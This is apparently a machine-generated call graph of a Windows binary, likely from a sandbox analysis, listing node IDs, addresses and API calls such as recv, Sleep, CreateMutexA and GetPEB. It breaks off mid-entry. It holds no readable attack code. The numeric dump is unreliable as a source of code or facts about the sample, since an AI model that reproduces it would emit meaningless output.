10770->10771 10773 6475f6 __dosmaperr RtlAllocateHeap 10771->10773 10772->10738 10772->10739 10773->10772 10775 6469d7 10774->10775 10777 6469df 10774->10777 10776 64adf5 ___free_lconv_mon RtlAllocateHeap 10775->10776 10776->10777 10777->10772 10779 6469cc RtlAllocateHeap 10778->10779 10780 6469f4 10779->10780 10783 646a25 10780->10783 10784 64b04b __cftof RtlAllocateHeap 10783->10784 10785 646a05 10784->10785 10785->10772 10789 613440 10794 612b30 10789->10794 10791 61344f std::_Throw_future_error 10792 6438af ___std_exception_copy RtlAllocateHeap 10791->10792 10793 613483 10792->10793 10795 6438af ___std_exception_copy RtlAllocateHeap 10794->10795 10796 612b68 __floor_pentium4 10795->10796 10796->10791 10807 613840 10808 6138f6 10807->10808 10810 61385f 10807->10810 10809 613920 10817 6291e0 10809->10817 10810->10808 10810->10809 10813 61391b 10810->10813 10816 6138cd shared_ptr 10810->10816 10812 627d50 RtlAllocateHeap 10812->10808 10815 646c6a RtlAllocateHeap 10813->10815 10814 613925 10815->10809 10816->10812 10818 62c1b9 RtlAllocateHeap 10817->10818 10819 6291ea 10818->10819 10819->10814 10850 613c47 10851 613c51 10850->10851 10854 613c5f 10851->10854 10866 6132d0 10851->10866 10852 613c68 10854->10852 10885 613810 10854->10885 10889 62c6ac 10866->10889 10868 61336b 10895 62c26a 10868->10895 10871 61333c __Mtx_unlock 10872 62c26a 5 API calls 10871->10872 10875 613350 __floor_pentium4 10871->10875 10873 613377 10872->10873 10876 62c6ac GetSystemTimePreciseAsFileTime 10873->10876 10874 613314 10874->10868 10874->10871 10892 62bd4c 10874->10892 10875->10854 10877 6133af 10876->10877 10878 62c26a 5 API calls 10877->10878 10879 6133b6 __Cnd_broadcast 10877->10879 10878->10879 10880 62c26a 5 API calls 10879->10880 10881 6133d7 __Mtx_unlock 10879->10881 10880->10881 10882 62c26a 5 API calls 10881->10882 10883 6133eb 10881->10883 10884 61340e 10882->10884 10883->10854 10884->10854 10886 61381c 10885->10886 10968 612440 10886->10968 10899 62c452 10889->10899 10891 62c6b9 10891->10874 10916 62bb72 10892->10916 10894 62bd5c 10894->10874 10896 62c292 10895->10896 10897 62c274 10895->10897 10896->10896 10897->10896 10922 62c297 10897->10922 10900 62c4a8 10899->10900 10902 62c47a __floor_pentium4 10899->10902 10900->10902 10905 62cf6b 10900->10905 10902->10891 10903 62c4fd __Xtime_diff_to_millis2 10903->10902 10904 62cf6b _xtime_get GetSystemTimePreciseAsFileTime 10903->10904 10904->10903 10906 62cf7a 10905->10906 10908 62cf87 __aulldvrm 10905->10908 10906->10908 10909 62cf44 10906->10909 10908->10903 10912 62cbea 10909->10912 10913 62cc07 10912->10913 10914 62cbfb GetSystemTimePreciseAsFileTime 10912->10914 10913->10908 10914->10913 10917 62bb9c 10916->10917 10918 62cf6b _xtime_get GetSystemTimePreciseAsFileTime 10917->10918 10921 62bba4 __Xtime_diff_to_millis2 __floor_pentium4 10917->10921 10919 62bbcf __Xtime_diff_to_millis2 10918->10919 10920 62cf6b _xtime_get GetSystemTimePreciseAsFileTime 10919->10920 10919->10921 10920->10921 10921->10894 10927 612ae0 10922->10927 10924 62c2ae 10934 62c1ff 10924->10934 10926 62c2bf std::_Throw_future_error 10928 62bedf InitOnceExecuteOnce 10927->10928 10929 612af4 __cftof 10928->10929 10929->10924 10930 64a671 __cftof 4 API calls 10929->10930 10933 646ccc 10930->10933 10931 648bec __cftof 4 API calls 10932 646cf6 10931->10932 10933->10931 10935 62c20b __EH_prolog3_GS 10934->10935 10936 6280c0 RtlAllocateHeap 10935->10936 10937 62c23d 10936->10937 10942 6126b0 10937->10942 10939 62c252 10959 627970 10939->10959 10941 62c25a 10941->10926 10943 627a00 RtlAllocateHeap 10942->10943 10944 612702 10943->10944 10945 612725 10944->10945 10946 628f40 RtlAllocateHeap 10944->10946 10947 628f40 RtlAllocateHeap 10945->10947 10948 61278e 10945->10948 10946->10945 10947->10948 10949 6127ed shared_ptr 10948->10949 10951 6128b8 10948->10951 10950 6438af ___std_exception_copy RtlAllocateHeap 10949->10950 10954 61284b 10950->10954 10953 646c6a RtlAllocateHeap 10951->10953 10952 61287a shared_ptr __floor_pentium4 10952->10939 10953->10954 10954->10952 10955 646c6a RtlAllocateHeap 10954->10955 10956 6128c2 10955->10956 10964 643912 10956->10964 10958 6128e5 shared_ptr 10958->10939 10960 62797b 10959->10960 10961 627996 shared_ptr 10959->10961 10960->10961 10962 646c6a RtlAllocateHeap 10960->10962 10961->10941 10963 6279ba 10962->10963 10965 643926 10964->10965 10966 64391f 10964->10966 10965->10958 10967 648ba3 ___std_exception_destroy RtlAllocateHeap 10966->10967 10967->10965 10971 62b5d6 10968->10971 10970 612472 10974 62b5f1 std::_Throw_future_error 10971->10974 10972 62b658 __cftof __floor_pentium4 10972->10970 10973 648bec __cftof 4 API calls 10975 62b69f 10973->10975 10974->10972 10974->10973 10981 62be50 10984 62bd8b 10981->10984 10983 62be66 std::_Throw_future_error 10985 6122e0 std::future_error::future_error RtlAllocateHeap 10984->10985 10986 62bd9f 10985->10986 10986->10983 9681 61a856 9682 61a870 9681->9682 9683 61a892 shared_ptr 9681->9683 9682->9683 9684 61a94e 9682->9684 9690 6280c0 9683->9690 9686 61a953 Sleep CreateMutexA 9684->9686 9705 646c6a 9684->9705 9689 61a98e 9686->9689 9688 61a903 9693 628104 9690->9693 9694 6280de 9690->9694 9691 6281ee 9713 629270 9691->9713 9693->9691 9696 628158 9693->9696 9697 62817d 9693->9697 9694->9688 9695 6281f3 9716 612480 9695->9716 9696->9695 9708 62d3e2 9696->9708 9701 62d3e2 RtlAllocateHeap 9697->9701 9702 628169 __cftof 9697->9702 9701->9702 9703 6281d0 shared_ptr 9702->9703 9704 646c6a RtlAllocateHeap 9702->9704 9703->9688 9704->9691 9706 646bf6 __cftof RtlAllocateHeap 9705->9706 9707 646c79 __cftof 9706->9707 9710 612480 __dosmaperr ___std_exception_copy std::_Throw_future_error 9708->9710 9709 62d401 std::_Throw_future_error 9709->9702 9710->9709 9720 6438af 9710->9720 9809 62c1b9 9713->9809 9717 61248e std::_Throw_future_error 9716->9717 9718 6438af ___std_exception_copy RtlAllocateHeap 9717->9718 9719 6124c3 9718->9719 9721 6124c3 9720->9721 9722 6438bc ___std_exception_copy 9720->9722 9721->9702 9722->9721 9723 6438e9 9722->9723 9726 64a1f1 9722->9726 9735 648ba3 9723->9735 9727 64a20c 9726->9727 9728 64a1fe 9726->9728 9738 6475f6 9727->9738 9728->9727 9733 64a223 9728->9733 9730 64a214 9741 646c5a 9730->9741 9732 64a21e 9732->9723 9733->9732 9734 6475f6 __dosmaperr RtlAllocateHeap 9733->9734 9734->9730 9736 64adf5 ___free_lconv_mon RtlAllocateHeap 9735->9736 9737 648bbb 9736->9737 9737->9721 9744 64a7c8 9738->9744 9803 646bf6 9741->9803 9743 646c66 9743->9732 9745 64a7d2 __dosmaperr 9744->9745 9752 6475fb 9745->9752 9755 64d82f 9745->9755 9747 64a813 __dosmaperr 9748 64a81b __dosmaperr 9747->9748 9749 64a853 9747->9749 9759 64adf5 9748->9759 9763 64a49f 9749->9763 9752->9730 9754 64adf5 ___free_lconv_mon RtlAllocateHeap 9754->9752 9758 64d83c __dosmaperr 9755->9758 9756 64d867 RtlAllocateHeap 9757 64d87a __dosmaperr 9756->9757 9756->9758 9757->9747 9758->9756 9758->9757 9760 64ae00 9759->9760 9762 64ae1b __dosmaperr 9759->9762 9761 6475f6 __dosmaperr RtlAllocateHeap 9760->9761 9760->9762 9761->9762 9762->9752 9764 64a50d __dosmaperr 9763->9764 9767 64a445 9764->9767 9766 64a536 9766->9754 9768 64a451 __cftof 9767->9768 9771 64a626 9768->9771 9770 64a473 __dosmaperr 9770->9766 9772 64a635 __dosmaperr 9771->9772 9774 64a65c __dosmaperr 9771->9774 9772->9774 9775 64f35f 9772->9775 9774->9770 9777 64f3df 9775->9777 9778 64f375 9775->9778 9776 64f4d0 __dosmaperr RtlAllocateHeap 9779 64f43b 9776->9779 9780 64adf5 ___free_lconv_mon RtlAllocateHeap 9777->9780 9801 64f42d 9777->9801 9778->9777 9784 64f3a8 9778->9784 9786 64adf5 ___free_lconv_mon RtlAllocateHeap 9778->9786 9790 64f49b 9779->9790 9800 64adf5 RtlAllocateHeap ___free_lconv_mon 9779->9800 9781 64f401 9780->9781 9782 64adf5 ___free_lconv_mon RtlAllocateHeap 9781->9782 9783 64f414 9782->9783 9787 64adf5 ___free_lconv_mon RtlAllocateHeap 9783->9787 9788 64adf5 ___free_lconv_mon RtlAllocateHeap 9784->9788 9802 64f3ca 9784->9802 9785 64adf5 ___free_lconv_mon RtlAllocateHeap 9789 64f3d4 9785->9789 9791 64f39d 9786->9791 9792 64f422 9787->9792 9793 64f3bf 9788->9793 9794 64adf5 ___free_lconv_mon RtlAllocateHeap 9789->9794 9795 64adf5 ___free_lconv_mon RtlAllocateHeap 9790->9795 9796 64ef3c ___free_lconv_mon RtlAllocateHeap 9791->9796 9797 64adf5 ___free_lconv_mon RtlAllocateHeap 9792->9797 9798 64f03a __dosmaperr RtlAllocateHeap 9793->9798 9794->9777 9799 64f4a1 9795->9799 9796->9784 9797->9801 9798->9802 9799->9774 9800->9779 9801->9776 9802->9785 9804 64a7c8 __dosmaperr RtlAllocateHeap 9803->9804 9806 646c01 __cftof 9804->9806 9805 646c0f 9805->9743 9806->9805 9807 646bf6 __cftof RtlAllocateHeap 9806->9807 9808 646c66 9807->9808 9808->9743 9812 62c123 9809->9812 9811 62c1ca std::_Throw_future_error 9815 6122e0 9812->9815 9814 62c135 9814->9811 9816 6438af ___std_exception_copy RtlAllocateHeap 9815->9816 9817 612317 __floor_pentium4 9816->9817 9817->9814 11000 611020 11001 6280c0 RtlAllocateHeap 11000->11001 11002 611031 11001->11002 11003 62d64e RtlAllocateHeap 11002->11003 11004 61103b 11003->11004 9829 646629 9832 6464c7 9829->9832 9833 6464d5 __cftof 9832->9833 9834 646520 9833->9834 9837 64652b 9833->9837 9836 64652a 9843 64a302 GetPEB 9837->9843 9839 646535 9840 64654a __cftof 9839->9840 9841 64653a GetPEB 9839->9841 9842 646562 ExitProcess 9840->9842 9841->9840 9844 64a31c __cftof 9843->9844 9844->9839 11066 612e00 11067 612e28 11066->11067 11070 62c68b 11067->11070 11073 62c3d5 11070->11073 11072 612e33 11074 62c3e1 11073->11074 11075 62c3eb 11073->11075 11076 62c3be 11074->11076 11077 62c39e 11074->11077 11075->11072 11086 62cd0a 11076->11086 11077->11075 11082 62ccd5 11077->11082 11080 62c3d0 11080->11072 11083 62cce3 InitializeCriticalSectionEx 11082->11083 11084 62c3b7 11082->11084 11083->11084 11084->11072 11087 62cd1f RtlInitializeConditionVariable 11086->11087 11087->11080 11043 611000 11044 62d64e RtlAllocateHeap 11043->11044 11045 61100a 11044->11045 11104 61a418 11106 61a420 shared_ptr 11104->11106 11105 61a93f 11107 646c6a RtlAllocateHeap 11105->11107 11106->11105 11109 61a4f3 shared_ptr 11106->11109 11108 61a944 11107->11108 11111 646c6a RtlAllocateHeap 11108->11111 11110 6280c0 RtlAllocateHeap 11109->11110 11112 61a903 11110->11112 11113 61a949 11111->11113 11114 61a94e 11113->11114 11115 646c6a RtlAllocateHeap 11113->11115 11116 61a953 Sleep CreateMutexA 11114->11116 11117 646c6a RtlAllocateHeap 11114->11117 11115->11114 11118 61a98e 11116->11118 11117->11116 11167 616ae9 11170 616b01 11167->11170 11168 6280c0 RtlAllocateHeap 11169 616bac 11168->11169 11171 629280 RtlAllocateHeap 11169->11171 11170->11168 11172 616bbd shared_ptr 11170->11172 11171->11172 11173 6280c0 RtlAllocateHeap 11172->11173 11174 616ce3 shared_ptr __floor_pentium4 11173->11174 11175 629ef0 11176 629f0c 11175->11176 11177 62c68b __Mtx_init_in_situ 2 API calls 11176->11177 11178 629f17 11177->11178 11179 6544f2 11180 65450c 11179->11180 11181 6544ff 11179->11181 11183 654518 11180->11183 11184 6475f6 __dosmaperr RtlAllocateHeap 11180->11184 11182 6475f6 __dosmaperr RtlAllocateHeap 11181->11182 11185 654504 11182->11185 11186 654539 11184->11186 11187 646c5a __cftof RtlAllocateHeap 11186->11187 11187->11185 11222 612ec0 11223 612f06 11222->11223 11226 612f6f 11222->11226 11224 62c6ac GetSystemTimePreciseAsFileTime 11223->11224 11225 612f12 11224->11225 11228 612f1d 11225->11228 11229 61301e 11225->11229 11227 612fef 11226->11227 11235 62c6ac GetSystemTimePreciseAsFileTime 11226->11235 11232 62d3e2 RtlAllocateHeap 11228->11232 11234 612f30 __Mtx_unlock 11228->11234 11230 62c26a 5 API calls 11229->11230 11231 613024 11230->11231 11233 62c26a 5 API calls 11231->11233 11232->11234 11236 612fb9 11233->11236 11234->11226 11234->11231 11235->11236 11237 62c26a 5 API calls 11236->11237 11238 612fc0 __Mtx_unlock 11236->11238 11237->11238 11239 62c26a 5 API calls 11238->11239 11240 612fd8 __Cnd_broadcast 11238->11240 11239->11240 11240->11227 11241 62c26a 5 API calls 11240->11241 11242 61303c 11241->11242 11243 62c6ac GetSystemTimePreciseAsFileTime 11242->11243 11253 613080 shared_ptr __Mtx_unlock 11243->11253 11244 6131c5 11245 62c26a 5 API calls 11244->11245 11246 6131cb 11245->11246 11247 62c26a 5 API calls 11246->11247 11248 6131d1 11247->11248 11249 62c26a 5 API calls 11248->11249 11255 613193 __Mtx_unlock 11249->11255 11250 6131a7 __floor_pentium4 11251 62c26a 5 API calls 11252 6131dd 11251->11252 11253->11244 11253->11246 11253->11250 11254 62c6ac GetSystemTimePreciseAsFileTime 11253->11254 11256 61315f 11254->11256 11255->11250 11255->11251 11256->11244 11256->11248 11256->11255 11257 62bd4c GetSystemTimePreciseAsFileTime 11256->11257 11257->11256 11213 61e0c0 recv 11214 61e122 recv 11213->11214 11215 61e157 recv 11214->11215 11217 61e191 11215->11217 11216 61e2b3 __floor_pentium4 11217->11216 11218 62c6ac GetSystemTimePreciseAsFileTime 11217->11218 11219 61e2ee 11218->11219 11220 62c26a 5 API calls 11219->11220 11221 61e358 11220->11221 11278 62d0c7 11279 62d0d7 11278->11279 11280 62d17f 11279->11280 11281 62d17b RtlWakeAllConditionVariable 11279->11281 11282 619adc 11283 619aea 11282->11283 11287 619afe shared_ptr 11282->11287 11284 61a917 11283->11284 11283->11287 11285 61a953 Sleep CreateMutexA 11284->11285 11286 646c6a RtlAllocateHeap 11284->11286 11288 61a98e 11285->11288 11286->11285 11289 627a00 RtlAllocateHeap 11287->11289 11290 619b74 11289->11290 11291 615c10 4 API calls 11290->11291 11292 619b7c 11291->11292 11305 618b30 11292->11305 11294 619b8d 11295 628220 RtlAllocateHeap 11294->11295 11296 619b9c 11295->11296 11297 627a00 RtlAllocateHeap 11296->11297 11298 619ca9 11297->11298 11299 615c10 4 API calls 11298->11299 11300 619cb1 11299->11300 11301 618b30 4 API calls 11300->11301 11302 619cc2 11301->11302 11303 628220 RtlAllocateHeap 11302->11303 11304 619cd1 11303->11304 11306 618b7c 11305->11306 11307 627a00 RtlAllocateHeap 11306->11307 11308 618b8c 11307->11308 11309 615c10 4 API calls 11308->11309 11310 618b97 11309->11310 11311 6280c0 RtlAllocateHeap 11310->11311 11312 618be3 11311->11312 11313 6280c0 RtlAllocateHeap 11312->11313 11314 618c35 11313->11314 11315 628220 RtlAllocateHeap 11314->11315 11318 618c47 shared_ptr 11315->11318 11316 618d01 shared_ptr __floor_pentium4 11316->11294 11317 646c6a RtlAllocateHeap 11319 618d2d 11317->11319 11318->11316 11318->11317 11320 627a00 RtlAllocateHeap 11319->11320 11321 618d8f 11320->11321 11322 615c10 4 API calls 11321->11322 11323 618d9a 11322->11323 11324 6280c0 RtlAllocateHeap 11323->11324 11325 618dec 11324->11325 11326 628220 RtlAllocateHeap 11325->11326 11328 618dfe shared_ptr 11326->11328 11327 618e7e shared_ptr __floor_pentium4 11327->11294 11328->11327 11329 646c6a RtlAllocateHeap 11328->11329 11330 618eaa 11329->11330 11331 627a00 RtlAllocateHeap 11330->11331 11332 618f0f 11331->11332 11333 615c10 4 API calls 11332->11333 11334 618f1a 11333->11334 11335 6280c0 RtlAllocateHeap 11334->11335 11336 618f6c 11335->11336 11337 628220 RtlAllocateHeap 11336->11337 11339 618f7e shared_ptr 11337->11339 11338 618ffe shared_ptr __floor_pentium4 11338->11294 11339->11338 11340 646c6a RtlAllocateHeap 11339->11340 11341 61902a 11340->11341 11377 6120a0 11378 62c68b __Mtx_init_in_situ 2 API calls 11377->11378 11379 6120ac 11378->11379 11380 62d64e RtlAllocateHeap 11379->11380 11381 6120b6 11380->11381 11382 6134a0 11383 6134ca shared_ptr 11382->11383 11384 6134aa 11382->11384 11384->11383 11385 646c6a RtlAllocateHeap 11384->11385 11386 6134f2 Concurrency::cancel_current_task shared_ptr 11385->11386 11392 615cad 11394 615caf 11392->11394 11393 615d17 shared_ptr __floor_pentium4 11394->11393 11395 646c6a RtlAllocateHeap 11394->11395 11396 615d47 __cftof 11395->11396 11396->11396 11397 6280c0 RtlAllocateHeap 11396->11397 11399 615e3e 11397->11399 11398 615ea6 shared_ptr __floor_pentium4 11399->11398 11400 646c6a RtlAllocateHeap 11399->11400 11401 615ed2 11400->11401 11402 615ffe shared_ptr __floor_pentium4 11401->11402 11403 646c6a RtlAllocateHeap 11401->11403 11404 61601b 11403->11404 11405 6280c0 RtlAllocateHeap 11404->11405 11406 616089 11405->11406 11407 6280c0 RtlAllocateHeap 11406->11407 11408 6160bd 11407->11408 11409 6280c0 RtlAllocateHeap 11408->11409 11410 6160ee 11409->11410 11411 6280c0 RtlAllocateHeap 11410->11411 11412 61611f 11411->11412 11413 6280c0 RtlAllocateHeap 11412->11413 11415 616150 11413->11415 11414 6165b1 shared_ptr __floor_pentium4 11415->11414 11416 646c6a RtlAllocateHeap 11415->11416 11417 6165dc 11416->11417 11418 627a00 RtlAllocateHeap 11417->11418 11419 6166a6 11418->11419 11420 615c10 4 API calls 11419->11420 11421 6166ac 11420->11421 11422 615c10 4 API calls 11421->11422 11423 6166b1 11422->11423 11424 6122c0 4 API calls 11423->11424 11425 6166c9 shared_ptr 11424->11425 11426 627a00 RtlAllocateHeap 11425->11426 11427 616732 11426->11427 11428 615c10 4 API calls 11427->11428 11429 61673d 11428->11429 11430 6122c0 4 API calls 11429->11430 11439 616757 shared_ptr 11430->11439 11431 616852 11432 6280c0 RtlAllocateHeap 11431->11432 11434 61689c 11432->11434 11433 627a00 RtlAllocateHeap 11433->11439 11435 6280c0 RtlAllocateHeap 11434->11435 11438 6168e3 shared_ptr __floor_pentium4 11435->11438 11436 615c10 4 API calls 11436->11439 11437 6122c0 4 API calls 11437->11439 11439->11431 11439->11433 11439->11436 11439->11437 11440 6142b0 11443 613ac0 11440->11443 11442 6142bb shared_ptr 11444 613af9 11443->11444 11445 646c6a RtlAllocateHeap 11444->11445 11450 613b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11444->11450 11446 613be6 11445->11446 11447 6132d0 6 API calls 11446->11447 11449 613c38 11446->11449 11447->11449 11448 6132d0 6 API calls 11452 613c5f 11448->11452 11449->11448 11449->11452 11450->11442 11451 613c68 11451->11442 11452->11451 11453 613810 4 API calls 11452->11453 11454 613cdb 11453->11454 11455 627d50 RtlAllocateHeap 11454->11455 11456 613d52 11454->11456 11455->11456 11457 62d3e2 RtlAllocateHeap 11456->11457 11458 613d84 11457->11458 11459 627d50 RtlAllocateHeap 11458->11459 11461 613e03 11458->11461 11459->11461 11460 613e9b shared_ptr 11460->11442 11461->11460 11462 646c6a RtlAllocateHeap 11461->11462 11463 613ec1 11462->11463 11464 619ab8 11466 619acc 11464->11466 11467 619b08 11466->11467 11468 627a00 RtlAllocateHeap 11467->11468 11469 619b74 11468->11469 11470 615c10 4 API calls 11469->11470 11471 619b7c 11470->11471 11472 618b30 4 API calls 11471->11472 11473 619b8d 11472->11473 11474 628220 RtlAllocateHeap 11473->11474 11475 619b9c 11474->11475 11476 627a00 RtlAllocateHeap 11475->11476 11477 619ca9 11476->11477 11478 615c10 4 API calls 11477->11478 11479 619cb1 11478->11479 11480 618b30 4 API calls 11479->11480 11481 619cc2 11480->11481 11482 628220 RtlAllocateHeap 11481->11482 11483 619cd1 11482->11483 11524 628680 11525 6286e0 11524->11525 11525->11525 11533 627760 11525->11533 11527 6286f9 11528 628f40 RtlAllocateHeap 11527->11528 11529 628714 11527->11529 11528->11529 11530 628f40 RtlAllocateHeap 11529->11530 11532 628769 11529->11532 11531 6287b1 11530->11531 11534 627864 shared_ptr __cftof 11533->11534 11535 62777b 11533->11535 11534->11527 11535->11534 11536 6278f1 11535->11536 11540 627811 11535->11540 11541 6277ea 11535->11541 11546 6277fb __cftof 11535->11546 11537 629270 RtlAllocateHeap 11536->11537 11538 6278f6 11537->11538 11539 612480 RtlAllocateHeap 11538->11539 11542 6278fb 11539->11542 11543 62d3e2 RtlAllocateHeap 11540->11543 11540->11546 11541->11538 11544 62d3e2 RtlAllocateHeap 11541->11544 11543->11546 11544->11546 11545 646c6a RtlAllocateHeap 11545->11536 11546->11534 11546->11545 11547 61a682 11548 61a68a shared_ptr 11547->11548 11549 61a75d shared_ptr 11548->11549 11550 61a949 11548->11550 11555 6280c0 RtlAllocateHeap 11549->11555 11551 61a94e 11550->11551 11552 646c6a RtlAllocateHeap 11550->11552 11553 61a953 Sleep CreateMutexA 11551->11553 11554 646c6a RtlAllocateHeap 11551->11554 11552->11551 11557 61a98e 11553->11557 11554->11553 11556 61a903 11555->11556 11558 613c8e 11559 613c98 11558->11559 11560 613cb4 11559->11560 11561 612410 5 API calls 11559->11561 11564 613810 4 API calls 11560->11564 11562 613ca5 11561->11562 11563 613ce0 RtlAllocateHeap 11562->11563 11563->11560 11565 613ccf 11564->11565 11566 613810 4 API calls 11565->11566 11567 613cdb 11566->11567 11568 627d50 RtlAllocateHeap 11567->11568 11569 613d52 11567->11569 11568->11569 11570 62d3e2 RtlAllocateHeap 11569->11570 11571 613d84 11570->11571 11572 627d50 RtlAllocateHeap 11571->11572 11574 613e03 11571->11574 11572->11574 11573 613e9b shared_ptr 11574->11573 11575 646c6a RtlAllocateHeap 11574->11575 11576 613ec1 11575->11576 11584 615a9e 11587 615a61 11584->11587 11585 6280c0 RtlAllocateHeap 11585->11587 11587->11584 11587->11585 11588 627a00 RtlAllocateHeap 11587->11588 11589 615bdd __floor_pentium4 11587->11589 11590 615730 11587->11590 11588->11587 11594 615860 shared_ptr 11590->11594 11598 615799 shared_ptr 11590->11598 11591 61592a 11599 628200 11591->11599 11592 6280c0 RtlAllocateHeap 11592->11598 11595 615900 shared_ptr __floor_pentium4 11594->11595 11596 646c6a RtlAllocateHeap 11594->11596 11595->11587 11597 615934 11596->11597 11598->11591 11598->11592 11598->11594 11602 62c1d9 11599->11602 11601 62820a 11605 62c15d 11602->11605 11604 62c1ea std::_Throw_future_error 11604->11601 11606 6122e0 std::future_error::future_error RtlAllocateHeap 11605->11606 11607 62c16f 11606->11607 11607->11604 11651 613970 11652 62c68b __Mtx_init_in_situ 2 API calls 11651->11652 11653 6139a7 11652->11653 11654 62c68b __Mtx_init_in_situ 2 API calls 11653->11654 11655 6139e6 11654->11655 11656 612170 11661 62c6fc 11656->11661 11659 62d64e RtlAllocateHeap 11660 612184 11659->11660 11662 61217a 11661->11662 11663 62c70c 11661->11663 11662->11659 11663->11662 11665 62cfbe 11663->11665 11666 62ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11665->11666 11667 62cfd0 11666->11667 11667->11663 11668 613770 11669 61379b 11668->11669 11670 646c6a RtlAllocateHeap 11669->11670 11671 6137cd shared_ptr 11669->11671 11672 61380f 11670->11672 11673 615f76 11675 615f81 shared_ptr 11673->11675 11674 615ffe shared_ptr __floor_pentium4 11675->11674 11676 646c6a RtlAllocateHeap 11675->11676 11677 61601b 11676->11677 11678 6280c0 RtlAllocateHeap 11677->11678 11679 616089 11678->11679 11680 6280c0 RtlAllocateHeap 11679->11680 11681 6160bd 11680->11681 11682 6280c0 RtlAllocateHeap 11681->11682 11683 6160ee 11682->11683 11684 6280c0 RtlAllocateHeap 11683->11684 11685 61611f 11684->11685 11686 6280c0 RtlAllocateHeap 11685->11686 11688 616150 11686->11688 11687 6165b1 shared_ptr __floor_pentium4 11688->11687 11689 646c6a RtlAllocateHeap 11688->11689 11690 6165dc 11689->11690 11691 627a00 RtlAllocateHeap 11690->11691 11692 6166a6 11691->11692 11693 615c10 4 API calls 11692->11693 11694 6166ac 11693->11694 11695 615c10 4 API calls 11694->11695 11696 6166b1 11695->11696 11697 6122c0 4 API calls 11696->11697 11698 6166c9 shared_ptr 11697->11698 11699 627a00 RtlAllocateHeap 11698->11699 11700 616732 11699->11700 11701 615c10 4 API calls 11700->11701 11702 61673d 11701->11702 11703 6122c0 4 API calls 11702->11703 11712 616757 shared_ptr 11703->11712 11704 616852 11705 6280c0 RtlAllocateHeap 11704->11705 11707 61689c 11705->11707 11706 627a00 RtlAllocateHeap 11706->11712 11708 6280c0 RtlAllocateHeap 11707->11708 11711 6168e3 shared_ptr __floor_pentium4 11708->11711 11709 615c10 4 API calls 11709->11712 11710 6122c0 4 API calls 11710->11712 11712->11704 11712->11706 11712->11709 11712->11710 11753 619f44 11754 619f4c shared_ptr 11753->11754 11755 61a01f shared_ptr 11754->11755 11756 61a92b 11754->11756 11759 6280c0 RtlAllocateHeap 11755->11759 11757 61a953 Sleep CreateMutexA 11756->11757 11758 646c6a RtlAllocateHeap 11756->11758 11761 61a98e 11757->11761 11758->11757 11760 61a903 11759->11760 11762 61a54d 11763 61a555 shared_ptr 11762->11763 11764 61a944 11763->11764 11766 61a628 shared_ptr 11763->11766 11765 646c6a RtlAllocateHeap 11764->11765 11767 61a949 11765->11767 11768 6280c0 RtlAllocateHeap 11766->11768 11769 61a94e 11767->11769 11770 646c6a RtlAllocateHeap 11767->11770 11771 61a903 11768->11771 11772 61a953 Sleep CreateMutexA 11769->11772 11773 646c6a RtlAllocateHeap 11769->11773 11770->11769 11774 61a98e 11772->11774 11773->11772 11787 61215a 11788 62c6fc InitializeCriticalSectionEx 11787->11788 11789 612164 11788->11789 11790 62d64e RtlAllocateHeap 11789->11790 11791 61216e 11790->11791 11812 614120 11813 61416a 11812->11813 11815 6141b2 __floor_pentium4 11813->11815 11816 613ee0 11813->11816 11817 613f48 11816->11817 11819 613f1e 11816->11819 11820 613f58 11817->11820 11822 612c00 11817->11822 11819->11815 11820->11815 11823 62d3e2 RtlAllocateHeap 11822->11823 11824 612c0e 11823->11824 11832 62b847 11824->11832 11826 612c42 11827 612c49 11826->11827 11838 612c80 11826->11838 11827->11815 11829 612c58 11841 612560 11829->11841 11831 612c65 std::_Throw_future_error 11833 62b854 11832->11833 11837 62b873 Concurrency::details::_Reschedule_chore 11832->11837 11844 62cb77 11833->11844 11835 62b864 11835->11837 11846 62b81e 11835->11846 11837->11826 11852 62b7fb 11838->11852 11840 612cb2 shared_ptr 11840->11829 11842 6438af ___std_exception_copy RtlAllocateHeap 11841->11842 11843 612597 __floor_pentium4 11842->11843 11843->11831 11845 62cb92 CreateThreadpoolWork 11844->11845 11845->11835 11847 62b827 Concurrency::details::_Reschedule_chore 11846->11847 11850 62cdcc 11847->11850 11849 62b841 11849->11837 11851 62cde1 TpPostWork 11850->11851 11851->11849 11853 62b817 11852->11853 11854 62b807 11852->11854 11853->11840 11854->11853 11856 62ca78 11854->11856 11857 62ca8d TpReleaseWork 11856->11857 11857->11853 11878 628320 11879 628339 11878->11879 11880 62834d 11879->11880 11881 628f40 RtlAllocateHeap 11879->11881 11881->11880 11882 646729 11885 646672 11882->11885 11884 64673b 11888 64667e __cftof 11885->11888 11886 646685 11887 6475f6 __dosmaperr RtlAllocateHeap 11886->11887 11889 64668a 11887->11889 11888->11886 11890 6466a5 11888->11890 11891 646c5a __cftof RtlAllocateHeap 11889->11891 11892 6466b7 11890->11892 11893 6466aa 11890->11893 11898 646695 11891->11898 11899 64a8c3 11892->11899 11895 6475f6 __dosmaperr RtlAllocateHeap 11893->11895 11895->11898 11896 6466c0 11897 6475f6 __dosmaperr RtlAllocateHeap 11896->11897 11896->11898 11897->11898 11898->11884 11900 64a8cf __cftof 11899->11900 11903 64a967 11900->11903 11902 64a8ea 11902->11896 11908 64a98a 11903->11908 11904 64d82f __dosmaperr RtlAllocateHeap 11905 64a9eb 11904->11905 11906 64adf5 ___free_lconv_mon RtlAllocateHeap 11905->11906 11907 64a9d0 11906->11907 11907->11902 11908->11904 11908->11907 11912 616535 11914 616549 shared_ptr 11912->11914 11913 646c6a RtlAllocateHeap 11916 6165dc 11913->11916 11914->11913 11915 6165b1 shared_ptr __floor_pentium4 11914->11915 11917 627a00 RtlAllocateHeap 11916->11917 11918 6166a6 11917->11918 11919 615c10 4 API calls 11918->11919 11920 6166ac 11919->11920 11921 615c10 4 API calls 11920->11921 11922 6166b1 11921->11922 11923 6122c0 4 API calls 11922->11923 11924 6166c9 shared_ptr 11923->11924 11925 627a00 RtlAllocateHeap 11924->11925 11926 616732 11925->11926 11927 615c10 4 API calls 11926->11927 11928 61673d 11927->11928 11929 6122c0 4 API calls 11928->11929 11938 616757 shared_ptr 11929->11938 11930 616852 11931 6280c0 RtlAllocateHeap 11930->11931 11933 61689c 11931->11933 11932 627a00 RtlAllocateHeap 11932->11938 11934 6280c0 RtlAllocateHeap 11933->11934 11937 6168e3 shared_ptr __floor_pentium4 11934->11937 11935 615c10 4 API calls 11935->11938 11936 6122c0 4 API calls 11936->11938 11938->11930 11938->11932 11938->11935 11938->11936 11995 612b10 11996 612b1a 11995->11996 11997 612b1c 11995->11997 11998 62c26a 5 API calls 11997->11998 11999 612b22 11998->11999 12000 